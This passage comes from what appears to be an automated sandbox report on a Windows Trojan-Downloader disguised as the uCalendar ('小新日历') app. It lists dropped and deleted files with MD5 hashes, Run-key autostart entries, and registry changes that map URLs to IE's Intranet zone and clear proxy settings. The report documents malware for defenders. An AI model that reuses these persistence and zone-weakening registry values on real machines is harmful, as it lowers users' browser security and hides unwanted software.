%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\stat[2].php (1177 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\core[2].php (751 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@baidu[2].txt (393 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@update.xiaoxinrili[2].txt (2899 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\stat[2].php (1097 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@cnzz.mmstat[1].txt (203 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\tclock.ini (184 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\FMTFilterinset[1].txt (108 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@7day.xiaoxinrili[1].txt (412 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@baidu[1].txt (196 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\update[1].txt (34 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\Version[1].txt (1 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@7day.xiaoxinrili[2].txt (206 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\data\Install.ini (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\Install[1].txt (34 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\tj[1].htm (552 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (11856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\PopBoxBig[1].txt (11 bytes)

The Trojan-Downloader deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\md5[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@7day.xiaoxinrili[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@baidu[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\FMTFilterinset[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\htmlinset1[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\Version[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\PopBoxSmall[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\Install[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@update.xiaoxinrili[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@7day.xiaoxinrili[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@update.xiaoxinrili[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\update.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\PopBoxBig[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\update[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\uCalhtml[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\FMTFilterinset[1].txt (0 bytes)

Registry activity

The process attrib.exe:1168 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A4 DB 8B 12 66 3B 4D 33 95 DE ED CD 46 BE 3F FB"

The process attrib.exe:1520 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1A 3A 42 A7 98 7C 2C 0D 03 4B 55 72 B4 FF 7E D2"

The process %original file name%.exe:2040 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A2 89 95 9B 57 C9 6B C2 15 31 91 49 C9 D6 CE 8D"

The process riliquicken.exe:408 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CB CF F8 7B EE 10 97 81 09 CD AE 07 4A 91 EC 3D"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan-Downloader modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan-Downloader modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan-Downloader modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan-Downloader deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process 6acad04bb03501dc920778ed12ba6d63.tmp:560 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{39E75F67-A843-44A0-B22E-8A4052ACC746}_is1]
"NoRepair" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{39E75F67-A843-44A0-B22E-8A4052ACC746}_is1]
"Inno Setup: Icon Group" = "小新日历"
"Publisher" = "小新日历"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{39E75F67-A843-44A0-B22E-8A4052ACC746}_is1]
"InstallDate" = "20150114"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{39E75F67-A843-44A0-B22E-8A4052ACC746}_is1]
"Inno Setup: User" = "%CurrentUserName%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{39E75F67-A843-44A0-B22E-8A4052ACC746}_is1]
"URLUpdateInfo" = "www.xiaoxinrili.com"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{39E75F67-A843-44A0-B22E-8A4052ACC746}_is1]
"Comments" = "小新日历最专业日历应用平台"
"Inno Setup: Setup Version" = "5.5.5 (u)"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012015011420150115]
"CachePath" = "%USERPROFILE%\Local Settings\History\History.IE5\MSHist012015011420150115\"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{39E75F67-A843-44A0-B22E-8A4052ACC746}_is1]
"NoModify" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{39E75F67-A843-44A0-B22E-8A4052ACC746}_is1]
"UninstallString" = "%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\unins000.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012015011420150115]
"CacheRepair" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{39E75F67-A843-44A0-B22E-8A4052ACC746}_is1]
"MinorVersion" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{39E75F67-A843-44A0-B22E-8A4052ACC746}_is1]
"Inno Setup: Language" = "chinesesimp"
"DisplayIcon" = "%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\uCalendar.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{39E75F67-A843-44A0-B22E-8A4052ACC746}_is1]
"MajorVersion" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012015011420150115]
"CacheOptions" = "11"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{39E75F67-A843-44A0-B22E-8A4052ACC746}_is1]
"Inno Setup: App Path" = "%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "45 F4 0B AA 1C 84 BC 31 25 87 90 2D AC 0D 24 63"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{39E75F67-A843-44A0-B22E-8A4052ACC746}_is1]
"HelpLink" = "www.xiaoxinrili.com"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{39E75F67-A843-44A0-B22E-8A4052ACC746}_is1]
"URLInfoAbout" = "www.xiaoxinrili.com"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{39E75F67-A843-44A0-B22E-8A4052ACC746}_is1]
"DisplayName" = "小新日历 4.0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{39E75F67-A843-44A0-B22E-8A4052ACC746}_is1]
"QuietUninstallString" = "%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\unins000.exe /SILENT"

[HKCU\Software\xiaoxinrili]
"Path" = "c:\%original file name%.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012015011420150115]
"CacheLimit" = "8192"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012015011420150115]
"CachePrefix" = ":2015011420150115:"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{39E75F67-A843-44A0-B22E-8A4052ACC746}_is1]
"Contact" = "www.xiaoxinrili.com"
"InstallLocation" = "%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\"
"DisplayVersion" = "4.0"

The Trojan-Downloader modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan-Downloader modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

To automatically run itself each time Windows is booted, the Trojan-Downloader adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"riliquicken" = "%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\riliquicken.exe apprun"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan-Downloader modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

To automatically run itself each time Windows is booted, the Trojan-Downloader adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"riliRun" = "%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\uCalendar.exe -run"

The Trojan-Downloader deletes the following registry key(s):

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014041520140416]

The Trojan-Downloader deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process uCalendar.exe:1840 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar]
"riliquicken.exe" = "小新日历加速程序"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "23 5F 4E 19 04 09 8C 48 C3 6D AC CA D8 F0 5E AA"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan-Downloader modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan-Downloader modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan-Downloader modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

To automatically run itself each time Windows is booted, the Trojan-Downloader adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"riliRun" = "%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\uCalendar.exe -run"

The Trojan-Downloader deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

Dropped PE files

MD5 File path
e6c684ccc9c4197511fc63a9fce99e6d c:\Documents and Settings\"%CurrentUserName%"\Application Data\WDJConnEngine\2.69.0.5490\DriverInstallerX64.exe
1c9b446e7bb1688408b00cbb1427654a c:\Documents and Settings\"%CurrentUserName%"\Application Data\WDJConnEngine\2.69.0.5490\DriverInstallerX86.exe
3af3015a20b946d5a517bcb759704adb c:\Documents and Settings\"%CurrentUserName%"\Application Data\WDJConnEngine\2.69.0.5490\WDJDriverInstaller.exe
47889977579454b72714878b9c422e53 c:\Documents and Settings\"%CurrentUserName%"\Application Data\WDJConnEngine\2.69.0.5490\adb_dev.dll
1e4985656fddb10f1538284d43a0a515 c:\Documents and Settings\"%CurrentUserName%"\Application Data\WDJConnEngine\2.69.0.5490\libcurl.dll
6d0f9f92c799356c14a104070a36fd4a c:\Documents and Settings\"%CurrentUserName%"\Application Data\WDJConnEngine\2.69.0.5490\libeay32.dll
1658dc894eb4174e9c3f69ffc5dba5fb c:\Documents and Settings\"%CurrentUserName%"\Application Data\WDJConnEngine\2.69.0.5490\ssleay32.dll
ee51801b1fa295a7e16dc6b75937e299 c:\Documents and Settings\"%CurrentUserName%"\Application Data\WDJConnEngine\2.69.0.5490\wdj_connection.dll
e9154ab5eacc68f37241d902949002e5 c:\Documents and Settings\"%CurrentUserName%"\Application Data\WDJConnEngine\2.69.0.5490\wdjconx64.exe
b1b3323ae79de68dc20114cf190e128b c:\Documents and Settings\"%CurrentUserName%"\Application Data\WDJConnEngine\2.69.0.5490\wdjconx86.exe
9a3f1e0e960edc18a9e1b7327c45193a c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\uCalendar\DesktopCalendar.dll
a56f6ae4b2bac4d224485f9387a4404b c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\uCalendar\Replace.dll
2461c65c1a87ff4edb70600d05d46015 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\uCalendar\Replace64.dll
f07e819ba2e46a897cfabf816d7557b2 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\uCalendar\UninsFiles\CallbackCtrl.dll
5841c3c749ff25672f41b1a9390577d5 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\uCalendar\UninsFiles\ItDownload_wex.dll
1094c2460f1757666259fb054ac4e17e c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\uCalendar\UninsFiles\WListViewEx.dll
500c424b869029816b2bfaf1e219b918 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\uCalendar\UninsFiles\WSysInfo.dll
0177746573eed407f8dca8a9e441aa49 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\uCalendar\UninsFiles\botva2.dll
d0372bedb70710aeff382818ad683f54 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\uCalendar\UninsFiles\webctrl.dll
2b3abef5bc1c547656c6ac6bfc1c5517 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\uCalendar\riliquicken.exe
9b21f129e74ea0507bfbb48c05db8f34 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\uCalendar\riliser.exe
496f899db2b789863e38d6e433f12987 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\uCalendar\uCalExternal.exe
1f5083874528f2bf4e8b1f075214c827 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\uCalendar\uCalHtml.exe
deb160af36bb91551be77789fa1743c0 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\uCalendar\uCalendar.exe
e025ac5fba63f331f27418e681405f70 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\uCalendar\ui_d.dll
adb0f9096aade0d914d8d6e33d69f886 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\uCalendar\unins000.exe
5f0218693884a23493c4d700684c9076 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\uCalendar\update.exe
31ebf7ed3fe2459cadd9c72544dce8a9 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\uCalendar\wdj_connection_wrapper.dll
5f0218693884a23493c4d700684c9076 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\tmp[1].exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name: ????
Product Name: ????
Product Version: 4.0
